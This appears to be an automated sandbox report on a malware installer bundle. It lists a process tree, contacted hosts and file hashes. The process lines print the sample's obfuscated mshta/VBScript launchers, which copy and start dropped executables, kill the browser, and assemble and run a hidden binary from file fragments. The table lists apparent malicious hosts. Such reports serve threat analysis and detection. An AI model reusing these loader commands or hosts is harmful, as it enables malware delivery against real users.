C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe
Fri2050293ea5.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe
Fri2002ce5f91c761.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe
Fri20109b9e174d0fc.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe
Fri20ba391d4469.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe
Fri20ee0a6fe195bd09.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe
Fri209f6924af86d795.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe
Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe
Fri20d5530575e8aa3ed.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe
Fri208f5f140853548.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20e095683c2b3a0c.exe
Fri20e095683c2b3a0c.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe
Fri209d5bfbb2.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe
Fri20c0c46650eeb2a.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe
Fri2060ea1c5d8fae8aa.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4604 -ip 4604
C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$50278,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 612
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe
"C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$20266,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF ""=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe
EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 620
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /IM "Fri20ba391d4469.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Fri208f5f140853548.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4212 -ip 4212
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 640
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 "=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 660
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct( "WscRiPt.ShElL" ).RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT +lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4212 -ip 4212
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT+lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 780
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\msiexec.exe
msiexec /Y .\6~iPCLZ.rJ
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 784
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffec215cc40,0x7ffec215cc4c,0x7ffec215cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1924 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2072,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2056 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2256 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4584,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4572 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri200ae385720d3.exe
Fri200ae385720d3.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 640
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4060 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1400
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5104,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5116 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | ppp-gl.biz | udp |
| US | 104.155.138.21:80 | ppp-gl.biz | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 21.138.155.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| N/A | 127.0.0.1:51583 | tcp | |
| N/A | 127.0.0.1:51585 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 104.155.138.21:80 | ppp-gl.biz | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 104.155.138.21:80 | ppp-gl.biz | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 8f86dedab3baf5ffaaebb8a77d417737 |
| SHA1 | 2469e1057b3a544402d57a602a916b0663a8ff8c |
| SHA256 | b25679ef641f0a807ef8200eb0ec464680dfdfff23b42bad85099b140c5d5630 |
| SHA512 | 2f70caeb89da15a3b1222b52cf49b09af61937b1bf92b5c0baad4d222a9c02f30e174cc9bd8078531fac26213fb990ab1cac78b13f38e7cbc75389685b0ec61c |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe
| MD5 | 789258af8927e9426e113f79a5c2ebcf |
| SHA1 | 6c64f717f5fc68e602760fefbc2221fd35fd7530 |
| SHA256 | f17e3e76cebd7d97c927151c727d210dca439be0142db2db5a0ccc70d95b9923 |
| SHA512 | 20cbd892411768fd4774fcb9f47f4eff754687808e58af8597714030e0705b53072b0128b8c32f5254836664276b242f8327427d0d6975cdfe6c3a90f4945ec3 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/4604-82-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4604-86-0x0000000064940000-0x0000000064959000-memory.dmp
memory/4604-85-0x0000000064941000-0x000000006494F000-memory.dmp
